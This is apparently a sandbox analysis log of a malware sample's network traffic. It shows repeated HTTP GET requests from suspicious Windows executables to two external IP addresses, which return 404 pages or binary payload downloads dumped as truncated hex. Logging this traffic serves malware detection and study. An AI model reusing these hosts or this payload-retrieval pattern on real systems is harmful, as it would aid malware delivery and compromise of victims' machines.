                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.44975291.202.233.14180332C:\Users\user\AppData\Local\Temp\524024912.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:15.953558922 CEST175OUTGET /PLTRESA HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:16.643790960 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:16 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.44975491.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:21.961731911 CEST166OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:22.670964956 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:22 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.44975691.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:24.724494934 CEST166OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:10:25.439697981 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:25 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.449758185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:28.590056896 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:29.317533016 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:29 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
                                            Sep 17, 2024 23:10:29.317673922 CEST1236INData Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
                                            Sep 17, 2024 23:10:29.317725897 CEST1236INData Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
                                            Sep 17, 2024 23:10:29.317759037 CEST1236INData Raw: d7 f3 2e 8d 8d 14 f5 b5 9f 7a 63 f6 a5 d8 1a 7c 20 73 ff 8e 3d 30 7a dd eb 21 21 b3 f9 61 8c d5 2b fe 2d a1 ba 84 7b d4 a9 1d 58 0e 2b 45 90 e9 60 fe 22 89 e1 f0 b4 9a 10 da cd 73 31 e1 bb 58 72 26 c0 bf e3 d9 d3 02 33 02 61 b9 fe 1e bc 27 56 16
                                            Data Ascii: .zc| s=0z!!a+-{X+E`"s1Xr&3a'VS:JN4sZO~"NX#"{W`0c>?'Ao.mcBF+5),Tk.8O:*Uvw}!\NvuLscl,UdS*uEcSh.
                                            Sep 17, 2024 23:10:29.317790985 CEST1236INData Raw: fb b6 7f 01 cb 83 9c ee 28 41 1b 8d 78 f9 94 d9 c6 b9 86 0b e3 73 c1 45 58 68 0b ab d3 47 ef 20 86 7b 55 d3 0c c7 b1 57 4f a7 20 cc 91 fa 41 9a 3d 58 7d e2 89 40 e4 51 3c 59 f9 49 f2 74 56 b3 66 34 4f 7c 10 6b bf f5 25 ce f7 63 be 60 cf 88 9f c7
                                            Data Ascii: (AxsEXhG {UWO A=X}@Q<YItVf4O|k%c`1HY@:o|k*(NTR^UZ!%W?y!\2LF%0HN7(%u*)X6OP3O9U+8t@GB<5V<u2JgHVQM`WBuS*
                                            Sep 17, 2024 23:10:29.317823887 CEST1236INData Raw: 90 bf ae ec 13 9d a5 4b e9 3e 96 7d 0f 9d b6 32 3c 1a 52 f8 10 a1 cf 98 d2 01 cf 79 55 d5 06 f1 2b cf f1 19 79 42 ba 77 de b5 f5 09 d1 13 61 a4 39 69 3f 6c ba 23 9c 2a bb ac 20 1c d2 25 85 7d f6 de a1 1f 26 49 d8 fb 80 30 2d c2 27 f1 9d 56 c6 3a
                                            Data Ascii: K>}2<RyU+yBwa9i?l#* %}&I0-'V:7ih`JX`JyJ 7#g=cfxe*z}^Gbbw;+1Pl\C&fots7I>5U^'7
                                            Sep 17, 2024 23:10:29.317858934 CEST776INData Raw: af 2d 94 59 fe 1d 33 87 3e e9 41 18 09 db d0 b8 9b 92 b4 44 c0 1e b5 bc 8e dd 96 e8 06 f3 c6 a1 5a a3 a9 93 28 47 ce 2b dc 08 af 4e 85 c6 48 22 91 67 96 5b ab af d2 7f bf de 80 e2 3c d5 57 b8 35 24 f9 39 e7 93 01 7b 25 f3 d7 59 75 0d f9 37 8c 7f
                                            Data Ascii: -Y3>ADZ(G+NH"g[<W5$9{%Yu7seOC{%XIcbc&Ch2?`c%2H5_@&r3-"j41%%uv#Sh}<~~`FF<Eq:7M{(hNYf'


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.449759185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:30.339901924 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:31.032341003 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:30 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
                                            Sep 17, 2024 23:10:31.032361031 CEST1236INData Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
                                            Sep 17, 2024 23:10:31.032377958 CEST448INData Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
                                            Sep 17, 2024 23:10:31.032392025 CEST1236INData Raw: 8a ff 83 22 c8 95 a3 8f b1 4a 38 b5 2d bb cd 5f 4e 56 ec 78 f2 2a 77 31 8e 84 ce 5f 01 9a 88 8c 69 78 7b fd d1 e9 90 ce fe 19 9e 71 f0 74 06 bd 8e 4b 2b c8 64 c7 2f 6c ac 9d 86 51 f9 3f 34 9e 6b 84 9f 6f bf 8a ab 20 11 6b d1 b9 32 c9 ad 31 26 8f
                                            Data Ascii: "J8-_NVx*w1_ix{qtK+d/lQ?4ko k21&p"NX^xp7'a#/n5za\a@hks_jq9mmC]ZF.?9&3FQQjOrl}u]?#B<
                                            Sep 17, 2024 23:10:31.032421112 CEST1236INData Raw: a3 9e 70 26 2d 00 71 9f 71 d4 4d 7a d0 f3 1c 0f 04 10 cb 9a 79 d7 26 8f 1d c1 cf 2b da 1a a8 b2 33 fa 6c 30 25 2e 24 74 32 6b 2f 20 ad 89 f4 1c 13 0e 03 f8 7a e3 ea 88 da f8 db d8 4b 75 28 fb 0d 03 74 64 2d c0 6f ec 7c 04 02 95 be 55 6f e0 c2 7c
                                            Data Ascii: p&-qqMzy&+3l0%.$t2k/ zKu(td-o|Uo|-mh3O4nloL;zvMwI6j( jxm%MN7c3"E eBQ%k75R3FF5B|Ws
                                            Sep 17, 2024 23:10:31.032448053 CEST1236INData Raw: 91 49 c1 2a 12 b8 b0 a9 d8 17 cb 3a 12 c7 e3 7c a5 03 4f b4 e0 6f 9c 0f e7 05 56 89 13 01 2e 57 8d a6 90 2d b4 9d 7e 7d ed 69 48 01 1d 6a 10 ef fe 4b e2 e5 f5 a4 22 95 85 0f af 55 50 55 e5 fb b7 be 00 67 40 4d f9 41 19 09 d0 1c fb 85 ca 46 e9 39
                                            Data Ascii: I*:|OoV.W-~}iHjK"UPUg@MAF9o_<,_7VMV>0pYZley?SAe~r$S0B(wtV74l#F{kf?se_<A9f^Lc}/ :DC=/~2JhY"j
                                            Sep 17, 2024 23:10:31.032478094 CEST1236INData Raw: 33 25 5a 99 e4 c8 3a 3b b9 7d 52 56 ea 5a fd 47 b2 99 75 9a fe 01 89 11 e0 f9 89 a0 f0 57 aa 9a e0 f3 6a 1f db 8b 59 f6 8e 92 a8 6b d0 c0 d0 81 23 b7 de 98 3d 07 b3 98 4f 84 16 60 b3 dd ab 53 0a e4 77 2b cc e6 31 65 b3 5f 58 b3 04 3f 64 c3 84 f3
                                            Data Ascii: 3%Z:;}RVZGuWjYk#=O`Sw+1e_X?dVqB)?d4SDeF!/V!Wi((3QPn|CSe,CJ4s`j:iK<}"X'sTfDxmo}`n}7U;ufk %
                                            Sep 17, 2024 23:10:31.032545090 CEST328INData Raw: 11 e0 1d 41 94 0d 7b ad 86 5c f0 cc 66 96 07 16 da 90 24 25 b4 09 e9 a0 6a 91 dc 3e da 89 4c 4a d8 4c 4e 48 fb 25 0a 8a 95 d7 ae dd ec f1 fd fd 04 37 d4 97 ff 66 94 b5 1d 23 3c e9 a6 1a 51 4c 45 d3 c7 d3 69 4b 47 bc 71 06 00 80 0c 64 1a 39 2f f7
                                            Data Ascii: A{\f$%j>LJLNH%7f#<QLEiKGqd9/P#v8CtHbFh/P;;.;j,Q'B:>[_Mk8!B\dEVd%O:U2,%/
                                            Sep 17, 2024 23:10:31.118762970 CEST8INData Raw: 1b b5 08 3e b6 9b 0d ab
                                            Data Ascii: >


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.449761185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:10:33.389040947 CEST274OUTGET /1 HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 185.215.113.66
                                            Connection: Keep-Alive
                                            Sep 17, 2024 23:10:34.077852011 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:33 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Tue, 17 Sep 2024 21:06:39 GMT
                                            Connection: keep-alive
                                            ETag: "66e9ef5f-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 14 1a ce da 82 08 ba 24 75 30 7f 6a ed 06 00 e6 10 10 57 dd e0 5a 01 72 bd f9 d5 ed 1c 35 60 f9 32 ce d3 a5 ea 4d 2a e6 0c e1 3c 65 d9 da f4 7e 2e 7e c6 ba 6c 55 4d 43 8b 05 f1 2c 33 05 0f 5e ad 81 37 56 45 04 64 01 6c 05 f2 ca 9b fa c5 86 d7 7c d9 19 4e 35 30 82 8a e7 0f 4c 4f 27 fa f6 0f 6d b1 63 2f 86 d4 9b b3 b8 9e 89 04 9f cc 59 b6 c8 6c 39 8e 85 db 24 67 1e 58 a4 34 75 41 9a ef 46 4a a7 1f ea b8 e5 66 6b 34 84 cb d2 5a 5c 61 e3 2a ec c0 b3 7a 6d bd 66 90 03 6b 60 c1 d3 3d cd f9 87 e8 32 b6 e7 85 b9 e4 c8 61 17 9d 1c 0d 5c 46 b8 c4 60 53 71 ba ab 09 fc ef 95 54 1c 84 a0 7a d9 10 c0 39 d8 2e 2d 2a 56 d3 b6 ee ee c1 dc cd 7a 9e 33 73 ec 32 64 ae 69 89 98 32 5a 29 b9 f2 81 dd 89 8c 00 6b 4a f7 21 ba ae 4a dc 2c 5f a9 20 d6 81 fd 4d f4 76 b4 52 7a 8f 9b 01 cc af 72 96 0d e8 7f cf 9e 80 24 c7 d2 ae 56 27 1f c6 27 9e 0a 4b 97 c9 ab ab d5 b7 40 4a fb b8 5a b5 13 1d 45 de ed 7b 13 44 ed e2 38 90 ef cf 34 ad 54 5b 38 00 6a 93 51 63 8b be a0 f0 20 18 4f 49 f8 31 a7 c2 9c 9a 36 cc 52 ac 12 de 12 6d f1 54 [TRUNCATED]
                                            Data Ascii: $u0jWZr5`2M*<e~.~lUMC,3^7VEdl|N50LO'mc/Yl9$gX4uAFJfk4Z\a*zmfk`=2a\F`SqTz9.-*Vz3s2di2Z)kJ!J,_ MvRzr$V''K@JZE{D84T[8jQc OI16RmT=gyJV9qUMuD6QEl"{.d=~rD$Ep=-Kg|I&]c)XYT,x7~W9r{$hKKvfK5w}yBLS^nX]P>=qU0_D*F&BRB1+Y@$2c#6:Pnr}$x/ql~p2 Qm&>CG)Iu$.I@q;@T9u'Odcm7r}y*}}?FHwx,6,$sg"S|Y):#lQLqye)>8`56f/iIq)cKG-i)iM1-]eLd3}fDA]\<Jr~SWEoXf5O5_g5,V|sB}T;uQT:z~*B88Smqm*gg9D;W@t^
                                            Sep 17, 2024 23:10:34.077917099 CEST1236INData Raw: a8 cd b6 25 a2 da 1a 53 6e 9c 3d e0 c0 2c b0 89 c9 36 5e 59 78 e5 46 22 d4 dd 8d ff 8c 57 da 6b 79 15 f8 be 5e db e9 49 15 0f f8 c3 4f 96 07 14 e2 9a 29 ff 2d 40 fd 3b 29 86 ca 57 e5 fb 68 04 d3 a7 dd 89 cf e1 60 e7 16 2d 5e 1f e7 1c 80 8e 86 df
                                            Data Ascii: %Sn=,6^YxF"Wky^IO)-@;)Wh`-^<`;!L?S@MN!$R"RgVUFcl{a6J4;_9=ipvrbLp}=|7 '.t}!sc\=}j
                                            Sep 17, 2024 23:10:34.077955008 CEST448INData Raw: bd 52 fd db cc 9b fc 19 4c 24 14 3a f8 15 aa f8 d2 28 b0 81 08 a3 83 e9 8d a9 68 84 95 22 8f bf 70 c5 c3 31 4f 46 17 26 19 c0 74 19 3a df 70 26 8d c0 61 94 1f b2 60 86 45 0b 4f 28 60 1a 98 cc 83 f5 48 8b 87 ce 2c 0c 8c 32 08 c5 3c 6a 67 68 8a 1b
                                            Data Ascii: RL$:(h"p1OF&t:p&a`EO(`H,2<jgh<lWm6Yi-"i^t(/v%Y{H5IiNsO6\gP=a-jR94,Gi!xr~Z)F<WR4Z-+lm[*
                                            Sep 17, 2024 23:10:34.077989101 CEST1236INData Raw: 8a ff 83 22 c8 95 a3 8f b1 4a 38 b5 2d bb cd 5f 4e 56 ec 78 f2 2a 77 31 8e 84 ce 5f 01 9a 88 8c 69 78 7b fd d1 e9 90 ce fe 19 9e 71 f0 74 06 bd 8e 4b 2b c8 64 c7 2f 6c ac 9d 86 51 f9 3f 34 9e 6b 84 9f 6f bf 8a ab 20 11 6b d1 b9 32 c9 ad 31 26 8f
                                            Data Ascii: "J8-_NVx*w1_ix{qtK+d/lQ?4ko k21&p"NX^xp7'a#/n5za\a@hks_jq9mmC]ZF.?9&3FQQjOrl}u]?#B<
